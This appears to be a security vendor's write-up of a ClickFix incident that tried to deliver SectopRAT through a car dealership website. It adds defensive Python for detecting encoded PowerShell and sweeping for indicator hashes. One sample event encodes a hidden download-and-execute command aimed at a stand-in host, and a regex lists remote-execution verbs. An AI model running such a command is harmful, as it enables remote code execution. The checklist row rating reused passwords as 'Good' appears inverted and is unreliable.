On March 11th, 2025, SpearTip’s Managed Detection and Response team responded to an alert of malicious code execution at a car dealership. Investigation of the indicators and an interview with the user indicated that the user visited the website of the dealership, from which they were redirected and then prompted to execute a PowerShell command through a ClickFix social engineering campaign. The campaign attempted to deploy the SectopRAT (Remote Access Trojan), which can be used to control browsers and steal sensitive information from the host.
The CAPTCHA page loaded Base64-encoded PowerShell into the clipboard; a user who followed the on-screen instructions would then paste and execute it. The domain “idostream.com” is owned by LESAutomotive, a company focused on vehicle video marketing solutions, which explains why its videos are embedded in the websites of car dealerships.
While ClickFix attacks are not new, SpearTip had not previously seen them delivered in this way, via a redirect from a visited website; they are more often delivered through phishing emails. SpearTip recommends educating users about such pop-ups and their potential dangers, and advising them to contact their IT administrator for next steps whenever a pop-up instructs them to perform abnormal actions on their machine.
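The lure described above leaves a recognizable trace in process-creation telemetry: powershell.exe started from explorer.exe (the Run dialog) with a Base64 -EncodedCommand and the usual window-hiding and execution-policy flags. The following is an added detection example written for this write-up, not SpearTip tooling and not code recovered from the incident; the sample events, parent/image paths, the lure.example.invalid URL and the scoring thresholds are all constructed assumptions.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example (not SpearTip tooling). The ClickFix lure has the user paste a
Base64-encoded PowerShell command into the Run dialog, so the resulting process is
powershell.exe carrying -EncodedCommand with explorer.exe as its parent. The
functions below decode that argument and score each event.
"""
import base64
import re

# Verbs in a decoded script that fetch or evaluate remote content.
REMOTE_EXEC = re.compile(
    r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|invoke-restmethod|"
    r"downloadstring|downloadfile|curl|wget)\b",
    re.IGNORECASE,
)


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, Base64).
    Used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _flag_value_pairs(cmdline: str):
    """Yield (flag_name_lowercase, value) for every '-flag value' pair on the command line."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[0] in "-/" and len(flag) > 1:
            yield flag[1:].lower(), value


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None.

    PowerShell accepts any unambiguous prefix of the parameter name (-e, -ec, -enc, ...),
    so the check is prefix-based rather than a literal match.
    """
    for name, value in _flag_value_pairs(cmdline):
        if name.startswith("e") and "encodedcommand".startswith(name):
            try:
                raw = base64.b64decode(value, validate=True)
            except ValueError:
                return None  # not valid Base64; PowerShell itself would reject it
            return raw.decode("utf-16-le", errors="replace")
    return None


def evasion_flags(cmdline: str):
    """Return the lure-typical flags present: hidden window, execution policy bypass."""
    found = []
    for name, value in _flag_value_pairs(cmdline):
        value = value.lower()
        if name.startswith("w") and "windowstyle".startswith(name) and value == "hidden":
            found.append("hidden window")
        elif value == "bypass" and (
            name == "ep" or (name.startswith("ex") and "executionpolicy".startswith(name))
        ):
            found.append("execution policy bypass")
    return found


def assess_event(event: dict):
    """Score one process-creation event. Returns a finding dict, or None if not of interest."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    score, reasons = 0, []
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        score += 2
        reasons.append("Base64-encoded command")
        if REMOTE_EXEC.search(script):
            score += 2
            reasons.append("decoded script fetches or evaluates remote content")
    for flag in evasion_flags(event["cmdline"]):
        score += 1
        reasons.append(flag)
    # explorer.exe as parent means an interactive launch (Run dialog, Start menu),
    # which is exactly how the ClickFix lure has the victim start the command.
    if event["parent"].lower().endswith("explorer.exe"):
        score += 1
        reasons.append("launched interactively from explorer.exe")
    if score < 2:
        return None
    return {"severity": "high" if score >= 4 else "medium", "score": score,
            "reasons": reasons, "decoded": script, "cmdline": event["cmdline"]}


def analyze(events):
    """Assess a batch of events and keep only the findings."""
    return [f for f in (assess_event(e) for e in events) if f is not None]


# Constructed sample events; none of these values come from the incident described above.
SAMPLE_EVENTS = [
    {   # what a ClickFix paste into Win+R looks like once it runs
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -w hidden -ep bypass -enc "
                   + encode_ps("iex (iwr 'http://lure.example.invalid/stage')"),
    },
    {   # an encoded command from a management agent: worth a look, but lower severity
        "parent": r"C:\Windows\CCM\CcmExec.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                   + encode_ps("Get-Service -Name wuauserv"),
    },
    {   # an interactive but plain launch: not reported
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe Get-Date",
    },
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"].upper(), "|", "; ".join(finding["reasons"]))
        print("   decoded:", finding["decoded"])
```

The decoding step matters because the clipboard payload is opaque in the raw command line; once decoded, the usual download-and-evaluate verbs are plainly visible and the parent process tells you whether a human pasted it. Encoded commands from management agents still surface, at a lower severity, so the rule is tunable rather than a blanket alert on -EncodedCommand.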
SpearTip’s Managed Detection and Response team operating out of our 24/7/365 Security Operations Center can help organizations actively detect and respond to malicious threats just like this one. Our services allow us to continuously monitor endpoints, identities, and user behaviors to protect organizations.
In addition, our Incident Response team assists organizations after they have been breached to help restore operations quickly and mitigate any further damage while working to find the root cause of a breach.
List of indicators
Dropped File, Lancaster.zip, SHA256 1a34c9b4500cf7859c36c102209902202fb7188aca1ba759f2d5018bf2655cc1
Dropped File, Stars_pack_version_21.3.1.zip, SHA256 6094ef164e5483ee1699a5c874c2c05fab0b3c15ef9bb5ab050c3bcfa8f14e43
Dropped File, zkwindow.exe, SHA256 e11d68ee9294a55de8548687935567d030dae3a594d40ea75f88598f30ebb76e (https://www.virustotal.com/gui/file/e11d68ee9294a55de8548687935567d030dae3a594d40ea75f88598f30ebb76e)
Existence of File Path, %TEMP%\version_21
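To turn the indicator list into a quick endpoint sweep, the following added example hashes every file under the given roots, matches against the three SHA256 values above (the zkwindow.exe hash is the one in its VirusTotal link) and checks for the version_21 directory under %TEMP%. It is written for this write-up and is not SpearTip tooling; the demo() helper plants constructed stand-in files in a temporary directory so the logic can be exercised without the real samples.

```python
"""Sweep a directory tree for the indicators listed above.

Added example, not SpearTip tooling. File names alone are weak evidence, so a
name match is reported separately from a hash match.
"""
import hashlib
import os
import pathlib
import tempfile

# Indicators from the list above. The zkwindow.exe hash is the one in its VirusTotal link.
INDICATOR_HASHES = {
    "1a34c9b4500cf7859c36c102209902202fb7188aca1ba759f2d5018bf2655cc1": "Lancaster.zip",
    "6094ef164e5483ee1699a5c874c2c05fab0b3c15ef9bb5ab050c3bcfa8f14e43": "Stars_pack_version_21.3.1.zip",
    "e11d68ee9294a55de8548687935567d030dae3a594d40ea75f88598f30ebb76e": "zkwindow.exe",
}
INDICATOR_NAMES = {name.lower() for name in INDICATOR_HASHES.values()}
SUSPICIOUS_SUBDIR = "version_21"  # the version_21 directory under %TEMP%


def sha256_of(path: pathlib.Path) -> str:
    """Stream the file through SHA256 so large archives do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(roots, hashes=INDICATOR_HASHES, names=INDICATOR_NAMES):
    """Walk each root; return findings as (kind, path, detail) tuples."""
    findings = []
    for root in roots:
        for p in pathlib.Path(root).rglob("*"):
            if not p.is_file():
                continue
            try:
                digest = sha256_of(p)
            except OSError:
                continue  # locked or unreadable file; keep going
            if digest in hashes:
                findings.append(("hash_match", str(p), hashes[digest]))
            elif p.name.lower() in names:
                findings.append(("name_match", str(p), digest))
    return findings


def check_temp_indicator(temp_dir=None):
    """True if the version_21 directory exists under %TEMP% (temp_dir overrides %TEMP%)."""
    base = temp_dir or os.environ.get("TEMP") or tempfile.gettempdir()
    return os.path.isdir(os.path.join(base, SUSPICIOUS_SUBDIR))


def demo():
    """Plant constructed stand-ins in a temp tree and sweep it.

    The planted file's own hash is injected into the indicator set so the hash path
    is exercised without the real samples. Returns (findings, temp_indicator_hit).
    """
    with tempfile.TemporaryDirectory() as tmp:
        downloads = pathlib.Path(tmp, "Downloads")
        downloads.mkdir()
        planted = downloads / "Lancaster.zip"
        planted.write_bytes(b"constructed stand-in, not the real sample")
        (downloads / "zkwindow.exe").write_bytes(b"constructed decoy with a matching name only")
        (downloads / "notes.txt").write_text("nothing to see")
        os.makedirs(os.path.join(tmp, SUSPICIOUS_SUBDIR))
        hashes = dict(INDICATOR_HASHES)
        hashes[sha256_of(planted)] = "planted stand-in"
        return sweep([tmp], hashes=hashes), check_temp_indicator(tmp)


if __name__ == "__main__":
    import sys
    roots = sys.argv[1:] or [os.environ.get("TEMP") or tempfile.gettempdir()]
    for kind, path, detail in sweep(roots):
        print(f"{kind}: {path} ({detail})")
    print("version_21 under %TEMP%:", check_temp_indicator())
```

Run it with the directories to inspect as arguments (user profiles and %TEMP% are the obvious roots); with no arguments it sweeps %TEMP% only. A hash match is a confirmed indicator; a name match or the bare existence of the version_21 directory is a prompt to pull the host for closer examination.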
Use our compromise checklist below to help you decide how to enhance your security posture if you believe you have been affected by a breach.
| # | Question | Response 1 | Result | Response 2 | Result | Unknown | Result |
|---|---|---|---|---|---|---|---|
| 1 | Do you have active services with the breached party? (If Yes, proceed to Question 2) | No | | Yes | | Unknown | Unknown Exposure – Treat as Yes |
| 1b | Do you use a competitor of the breached party? | No | Not likely to be exposed | Yes | Minimal likelihood of exposure | Unknown | Unknown Exposure |
| 1c | Do you have a vendor that utilizes the services of the breached party? | No | Not likely to be exposed | Yes | Potential Exposure | Unknown | Unknown Exposure – Treat as Potential Exposure |
| 2 | Do you have a secure VPN connection with the breached party? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
| 3 | Do you require the breached party to utilize MFA when connecting to your systems? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
| 4 | Do you require MFA to connect to the breached party? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
| 5 | Have you configured SSO with the breached party? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
| 6 | If not using SSO, are your account passwords with the third party common with your other credentials? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
| 7 | Does the breached party have access to sensitive or critical data or systems in your environment? | No | Good | Yes | Potential for action to be taken | Unknown | Unknown Exposure |
| 8 | Do you share documents back and forth with the breached party? | No | Good | Yes | Potential for action to be taken | Unknown | Unknown Exposure |
| 9 | Do the documents you share with the breached party contain sensitive information? | No | Good | Yes | Potential for action to be taken | Unknown | Unknown Exposure |
| 10 | Aside from the data in the application, is there other data that the vendor knows about your organization that could be problematic, such as credit card information or other financial information that could be exploited? | No | Good | Yes | Potential for action to be taken | Unknown | Unknown Exposure |
| 11 | Do you monitor for Dark Web data exposure? | Yes | Good | No | Potential for action to be taken | Unknown | Unknown Exposure |
©2025 SpearTip, LLC. All rights reserved.